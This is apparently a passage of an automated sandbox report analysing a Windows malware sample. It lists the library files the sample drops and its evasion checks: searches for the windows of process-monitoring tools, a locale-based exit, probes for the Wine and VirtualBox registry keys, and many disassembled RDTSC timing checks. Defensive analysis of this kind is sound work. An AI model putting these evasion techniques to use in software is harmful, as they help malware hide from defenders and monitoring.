Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00969270

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58173

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B940D4 second address: B940DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B940DA second address: B939BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cmc 0x0000000c push dword ptr [ebp+122D1145h] 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D2905h], edx 0x00000019 xor dword ptr [ebp+122D2214h], ebx 0x0000001f popad 0x00000020 call dword ptr [ebp+122D1C46h] 0x00000026 pushad 0x00000027 add dword ptr [ebp+122D25B0h], eax 0x0000002d xor eax, eax 0x0000002f mov dword ptr [ebp+122D287Ah], ecx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jno 00007FF830E5CFCCh 0x0000003f mov dword ptr [ebp+122D2BCFh], eax 0x00000045 jc 00007FF830E5CFCCh 0x0000004b sub dword ptr [ebp+122D287Ah], ecx 0x00000051 mov esi, 0000003Ch 0x00000056 clc 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b mov dword ptr [ebp+122D287Ah], ecx 0x00000061 lodsw 0x00000063 sub dword ptr [ebp+122D287Ah], ecx 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d sub dword ptr [ebp+122D2638h], ecx 0x00000073 mov dword ptr [ebp+122D287Ah], eax 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jp 00007FF830E5CFD4h 0x00000083 nop 0x00000084 jmp 00007FF830E5CFD8h 0x00000089 push eax 0x0000008a pushad 0x0000008b pushad 0x0000008c push edx 0x0000008d pop edx 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B939BF second address: B939C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B939C8 second address: B939CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14989 second address: D149A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF830ED6D48h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149A6 second address: D149B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149B2 second address: D149C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF830ED6D36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f ja 00007FF830ED6D36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D149C7 second address: D149D3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF830E5CFC6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03957 second address: D03973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF830ED6D3Ch 0x0000000a jg 00007FF830ED6D38h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03973 second address: D0399C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF830E5CFD8h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0399C second address: D039AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF830ED6D36h 0x0000000a js 00007FF830ED6D36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D039AC second address: D039CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFCBh 0x00000007 jmp 00007FF830E5CFCEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C38 second address: D13C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF830ED6D3Dh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C4C second address: D13C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13F18 second address: D13F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13F22 second address: D13F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13F26 second address: D13F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14098 second address: D1409F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D87 second address: D17DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FF830ED6D3Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DA3 second address: D17DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DAD second address: D17DC3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FF830ED6D36h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DC3 second address: D17DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DC7 second address: D17E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jp 00007FF830ED6D36h 0x00000015 popad 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FF830ED6D38h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edx, dword ptr [ebp+122D2DB0h] 0x00000038 call 00007FF830ED6D42h 0x0000003d mov edx, edi 0x0000003f pop ecx 0x00000040 lea ebx, dword ptr [ebp+12457B4Ch] 0x00000046 push eax 0x00000047 push eax 0x00000048 jl 00007FF830ED6D3Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E77 second address: D17E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E81 second address: D17EB1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub ch, FFFFFFBAh 0x00000011 push 00000000h 0x00000013 movsx edi, cx 0x00000016 call 00007FF830ED6D39h 0x0000001b pushad 0x0000001c jc 00007FF830ED6D3Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EB1 second address: D17EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EB5 second address: D17EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17EB9 second address: D17F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007FF830E5CFD8h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007FF830E5CFD1h 0x00000018 jmp 00007FF830E5CFCBh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007FF830E5CFD2h 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 pop eax 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F13 second address: D17F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F17 second address: D17F60 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF830E5CFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF830E5CFC8h 0x00000010 popad 0x00000011 pop eax 0x00000012 mov esi, dword ptr [ebp+122D2B03h] 0x00000018 or dword ptr [ebp+122D295Fh], esi 0x0000001e push 00000003h 0x00000020 je 00007FF830E5CFC8h 0x00000026 mov edx, edi 0x00000028 push 00000000h 0x0000002a jmp 00007FF830E5CFCBh 0x0000002f push 00000003h 0x00000031 mov dword ptr [ebp+122D25B0h], eax 0x00000037 push B3AFF32Ch 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F60 second address: D17F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F64 second address: D17F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F68 second address: D17F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F72 second address: D17FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 0C500CD4h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FF830E5CFC8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ecx, edi 0x0000002a lea ebx, dword ptr [ebp+12457B55h] 0x00000030 mov edx, dword ptr [ebp+122D2BD3h] 0x00000036 xchg eax, ebx 0x00000037 jmp 00007FF830E5CFD1h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jnl 00007FF830E5CFC6h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17FC9 second address: D17FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180AB second address: D180B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180B7 second address: D180BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180BB second address: D180CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180CA second address: D180F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D48h 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FF830ED6D36h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180F4 second address: D180FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180FA second address: D18129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push esi 0x00000010 jc 00007FF830ED6D36h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF830ED6D46h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18129 second address: D18171 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF830E5CFC8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov cx, 2100h 0x00000026 lea ebx, dword ptr [ebp+12457B60h] 0x0000002c mov dword ptr [ebp+122D287Ah], edi 0x00000032 stc 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 je 00007FF830E5CFC8h 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18171 second address: D18188 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF830ED6D38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FF830ED6D36h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18188 second address: D1818E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36240 second address: D36246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36246 second address: D36250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36250 second address: D36256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3639F second address: D363A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D363A3 second address: D363AD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D363AD second address: D363B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D363B3 second address: D363DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007FF830ED6D42h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36819 second address: D3681E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36AED second address: D36AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36C45 second address: D36C4F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF830E5CFC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36C4F second address: D36C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b ja 00007FF830ED6D36h 0x00000011 jc 00007FF830ED6D36h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36C6C second address: D36C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FF830E5CFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007FF830E5CFC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36DF5 second address: D36DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D36DFB second address: D36E0B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF830E5CFC6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3736B second address: D3736F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3736F second address: D37385 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF830E5CFD2h 0x0000000e jnl 00007FF830E5CFC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37385 second address: D3739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FF830ED6D36h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3739A second address: D373A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D374F9 second address: D37503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF830ED6D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37503 second address: D37513 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF830E5CFC6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37513 second address: D37517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B025 second address: D3B029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B029 second address: D3B02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B4F8 second address: D3B4FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B4FE second address: D3B504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B504 second address: D3B508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B677 second address: D3B67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B67B second address: D3B6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jg 00007FF830E5CFC6h 0x00000016 jmp 00007FF830E5CFCAh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
